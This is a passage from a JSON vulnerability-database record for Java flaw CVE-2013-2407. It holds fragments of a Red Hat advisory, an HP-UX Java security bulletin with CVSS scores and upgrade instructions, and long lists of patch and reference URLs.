tml\nhttps://www.redhat.com/security/data/cve/CVE-2013-0351.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0401.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0409.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0419.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0423.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0424.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0425.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0426.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0427.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0428.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0432.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0433.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0434.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0435.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0438.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0440.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0441.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0442.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0443.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0445.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0446.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0450.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0809.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1473.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1476.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1478.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1480.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1481.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1486.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1487.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1491.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1493.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1500.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1537.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1540.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1557.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1563.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1569.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1571.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2383.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2384.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2394.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2407.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2417.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2418.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2419.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2420.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2422.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2424.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2429.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2430.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2432.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2433.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2435.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2437.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2440.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2442.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2443.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2444.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2446.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2447.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2448.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2450.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2451.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2452.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2453.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2454.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2455.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2456.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2457.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2459.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2463.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2464.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2465.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2466.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2468.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2469.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2470.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2471.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2472.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2473.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-3743.html\nhttps://access.redhat.com/security/updates/classification/#low\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFSZ/wXXlSAg2UNWIIRAh0tAKCyvI+fzg/YQLKd/pOKMVGUasClAACfe8NU\ntxj9ugDGtaxqHsieOTzEGWM=\n=p6f6\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n \n It was discovered that GnomeFileTypeDetector did not check for read\n permissions when accessing files. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c03868911\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c03868911\nVersion: 1\n\nHPSBUX02907 rev.1 - HP-UX Running Java7, Remote Unauthorized Access,\nDisclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2013-07-31\nLast Updated: 2013-07-31\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime\nEnvironment (JRE) and Java Developer Kit (JDK) running on HP-UX. \nHP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.06 and earlier\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2013-2400 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4\nCVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2443 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\nCVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2013-2449 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2013-2458 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2460 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2013-2462 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2467 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9\nCVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2013-3744 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location: http://www.hp.com/java\n\nOS Version\n Release Version\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.07 or subsequent\n\nMANUAL ACTIONS: Yes - Update\nFor Java v7.0 update to Java v7.0.07 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.07.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 31 July 2013 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2013-2407" }, { "db": "BID", "id": "60653" }, { "db": "VULMON", "id": "CVE-2013-2407" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122651" }, { "db": "PACKETSTORM", "id": "122522" } ], "trust": 1.89 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-2407", "trust": 2.7 }, { "db": "BID", "id": "60653", "trust": 2.0 }, { "db": "SECUNIA", "id": "54154", "trust": 1.7 }, { "db": "USCERT", "id": "TA13-169A", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201306-295", "trust": 0.6 }, { "db": "HITACHI", "id": "HS13-015", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2013-2407", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122422", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122423", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122438", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122189", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122651", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "122522", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2407" }, { "db": "BID", "id": "60653" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122651" }, { "db": "PACKETSTORM", "id": "122522" }, { "db": "CNNVD", "id": "CNNVD-201306-295" }, { "db": "NVD", "id": "CVE-2013-2407" } ] }, "id": "VAR-201306-0253", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-06-12T19:34:22.506000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "jre-7u25-linux-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46255" }, { "title": "jre-7u25-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46259" }, { "title": "jre-7u25-solaris-sparc", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46263" }, { "title": "jre-7u25-windows-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46267" }, { "title": "jre-7u25-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46258" }, { "title": "jre-7u25-solaris-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46262" }, { "title": "jre-7u25-windows-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46266" }, { "title": "jre-7u25-solaris-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46261" }, { "title": "jre-7u25-windows-i586-iftw", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46265" }, { "title": "jre-7u25-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46269" }, { "title": "jre-7u25-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46257" }, { "title": "jre-7u25-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46260" }, { "title": "jre-7u25-solaris-sparcv9", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46264" }, { "title": "jre-7u25-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46268" }, { "title": "jre-7u25-linux-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=46256" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1907-1" }, { "title": "Ubuntu Security Notice: icedtea-web update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1907-2" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1908-1" }, { "title": "Debian Security Advisories: DSA-2727-1 openjdk-6 -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e7d6ea8eb77ee8911e5bbc08ff43f55c" }, { "title": "Debian Security Advisories: DSA-2722-1 openjdk-7 -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=29128f887c1069c9cc8e265bacca4512" }, { "title": "Amazon Linux AMI: ALAS-2013-207", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-207" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131456 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2013-204", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-204" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131455 - security advisory" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2407" }, { "db": "CNNVD", "id": "CNNVD-201306-295" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2407" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642336" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1456.html" }, { "trust": 1.8, "url": "http://advisories.mageia.org/mgasa-2013-0185.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/60653" }, { "trust": 1.7, "url": "http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/c82ed89b21bc" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-0963.html" }, { "trust": 1.7, "url": "http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/0e80792291c0" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=975127" }, { "trust": 1.7, "url": "http://secunia.com/advisories/54154" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00027.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1060.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00028.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html" }, { "trust": 1.7, "url": "http://www.us-cert.gov/ncas/alerts/ta13-169a" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=137545592101387\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=137545505800971\u0026w=2" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-1059.html" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:183" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19568" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a18622" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a17195" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2456" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2445" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2407" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2447" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2443" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2452" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2458" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1571" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2412" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2449" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2463" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2448" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2465" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2446" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2444" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2450" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2469" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2470" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1500" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2461" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2471" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2453" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2455" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2457" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2459" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2472" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2460" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2454" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg24036377" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg24035869" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg24036375" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.3, "url": "http://www.oracle.com/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas36583326fc6c02fdf86257bc60079968c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037193" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jtfhr2..t.cyta.7%2a%2ak.bw89mq%5f%5fdehufqb0" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jtfhr2..t.cytc.7%2a%2ak.bw89mq%5f%5fdeoifqd0" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-015/index.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21652590" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001621" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640206" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21657132" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21647053" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100173341" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660228" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660230" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660080" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21667626" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1019760" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100175056" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5094215" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644918" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21647384" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21643697" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651053" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21653833" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650599" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004514" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648481" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645500" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21656528" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21650653" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21652561" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036927" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-1908-1/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663487" }, { "trust": 0.3, "url": 